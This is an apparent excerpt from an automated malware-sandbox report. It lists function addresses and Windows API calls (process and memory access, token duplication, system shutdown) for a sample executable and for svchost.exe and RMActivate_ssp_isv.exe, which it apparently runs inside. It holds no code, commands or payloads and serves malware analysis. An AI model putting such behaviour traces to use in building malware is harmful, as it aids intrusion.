                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12CF0 NtOpenProcess,6_2_02F12CF0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12CC0 NtQueryVirtualMemory,6_2_02F12CC0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12C00 NtQueryInformationProcess,6_2_02F12C00
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12DB0 NtEnumerateKey,6_2_02F12DB0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12D00 NtSetInformationFile,6_2_02F12D00
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F13090 NtSetValueKey,6_2_02F13090
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F13010 NtOpenDirectoryObject,6_2_02F13010
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F13D70 NtOpenThread,6_2_02F13D70
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F13D10 NtOpenProcessToken,6_2_02F13D10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_00629040 NtCreateFile,6_2_00629040
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006291B0 NtReadFile,6_2_006291B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006292A0 NtDeleteFile,6_2_006292A0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_00629340 NtClose,6_2_00629340
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006294B0 NtAllocateVirtualMemory,6_2_006294B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9F1EC NtReadVirtualMemory,6_2_02C9F1EC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9F13F NtReadVirtualMemory,6_2_02C9F13F
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9F8A2 NtClose,6_2_02C9F8A2
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0049A1EF
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00488310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00488310
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004951BD
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0043E6A00_2_0043E6A0
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045D9750_2_0045D975
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0043FCE00_2_0043FCE0
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004521C50_2_004521C5
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004662D20_2_004662D2
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004B03DA0_2_004B03DA
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0046242E0_2_0046242E
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004525FA0_2_004525FA
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0048E6160_2_0048E616
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004466E10_2_004466E1
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0046878F0_2_0046878F
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004668440_2_00466844
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004B08570_2_004B0857
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004488080_2_00448808
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004988890_2_00498889
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045CB210_2_0045CB21
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00466DB60_2_00466DB6
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00446F9E0_2_00446F9E
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004430300_2_00443030
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045F1D90_2_0045F1D9
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004531870_2_00453187
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004312870_2_00431287
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004514840_2_00451484
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004455200_2_00445520
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004576960_2_00457696
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004457600_2_00445760
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004519780_2_00451978
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00469AB50_2_00469AB5
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004B7DDB0_2_004B7DDB
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00451D900_2_00451D90
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045BDA60_2_0045BDA6
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0043DF000_2_0043DF00
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00443FE00_2_00443FE0
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_01F936000_2_01F93600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004184432_2_00418443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010002_2_00401000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012502_2_00401250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023682_2_00402368
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023702_2_00402370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EBE32_2_0042EBE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC732_2_0040FC73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC772_2_0040FC77
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DE732_2_0040DE73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041662E2_2_0041662E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004166332_2_00416633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE932_2_0040FE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027002_2_00402700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DFC32_2_0040DFC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FB02_2_00402FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DFB72_2_0040DFB7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A22_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037856302_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E1AA32_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_0280D3B95_2_0280D3B9
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EE6695_2_027EE669
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EC6495_2_027EC649
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F4E095_2_027F4E09
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F4E045_2_027F4E04
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EC7995_2_027EC799
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EC78D5_2_027EC78D
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EE44D5_2_027EE44D
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027EE4495_2_027EE449
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F6C195_2_027F6C19
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeCode function: 5_2_027F35495_2_027F3549
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F602C06_2_02F602C0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F802746_2_02F80274
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02FA03E66_2_02FA03E6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EEE3F06_2_02EEE3F0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9A3526_2_02F9A352
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F720006_2_02F72000
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F981CC6_2_02F981CC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02FA01AA6_2_02FA01AA
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F941A26_2_02F941A2
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F681586_2_02F68158
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ED01006_2_02ED0100
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F7A1186_2_02F7A118
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EFC6E06_2_02EFC6E0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EDC7C06_2_02EDC7C0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE07706_2_02EE0770
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F047506_2_02F04750
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F8E4F66_2_02F8E4F6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F924466_2_02F92446
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F844206_2_02F84420
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02FA05916_2_02FA0591
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE05356_2_02EE0535
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EDEA806_2_02EDEA80
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F96BD76_2_02F96BD7
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9AB406_2_02F9AB40
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F0E8F06_2_02F0E8F0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EC68B86_2_02EC68B8
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE28406_2_02EE2840
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EEA8406_2_02EEA840
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE29A06_2_02EE29A0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02FAA9A66_2_02FAA9A6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EF69626_2_02EF6962
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9EEDB6_2_02F9EEDB
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9CE936_2_02F9CE93
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EF2E906_2_02EF2E90
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE0E596_2_02EE0E59
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9EE266_2_02F9EE26
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EECFE06_2_02EECFE0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ED2FC86_2_02ED2FC8
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F5EFA06_2_02F5EFA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F54F406_2_02F54F40
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F00F306_2_02F00F30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F82F306_2_02F82F30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F22F286_2_02F22F28
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ED0CF26_2_02ED0CF2
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F80CB56_2_02F80CB5
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE0C006_2_02EE0C00
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EDADE06_2_02EDADE0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EF8DBF6_2_02EF8DBF
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F7CD1F6_2_02F7CD1F
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EEAD006_2_02EEAD00
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F812ED6_2_02F812ED
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EFB2C06_2_02EFB2C0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE52A06_2_02EE52A0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F2739A6_2_02F2739A
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ECD34C6_2_02ECD34C
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9132D6_2_02F9132D
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F970E96_2_02F970E9
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9F0E06_2_02F9F0E0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE70C06_2_02EE70C0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F8F0CC6_2_02F8F0CC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EEB1B06_2_02EEB1B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02FAB16B6_2_02FAB16B
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F1516C6_2_02F1516C
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ECF1726_2_02ECF172
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F916CC6_2_02F916CC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9F7B06_2_02F9F7B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02ED14606_2_02ED1460
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9F43F6_2_02F9F43F
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F7D5B06_2_02F7D5B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F975716_2_02F97571
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F8DAC66_2_02F8DAC6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F25AA06_2_02F25AA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F7DAAC6_2_02F7DAAC
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F81AA36_2_02F81AA3
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F53A6C6_2_02F53A6C
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9FA496_2_02F9FA49
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F97A466_2_02F97A46
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F55BF06_2_02F55BF0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F1DBF96_2_02F1DBF9
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EFFB806_2_02EFFB80
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9FB766_2_02F9FB76
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE38E06_2_02EE38E0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F4D8006_2_02F4D800
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE99506_2_02EE9950
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EFB9506_2_02EFB950
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F759106_2_02F75910
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE9EB06_2_02EE9EB0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F9FFB16_2_02F9FFB1
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02EE1F926_2_02EE1F92
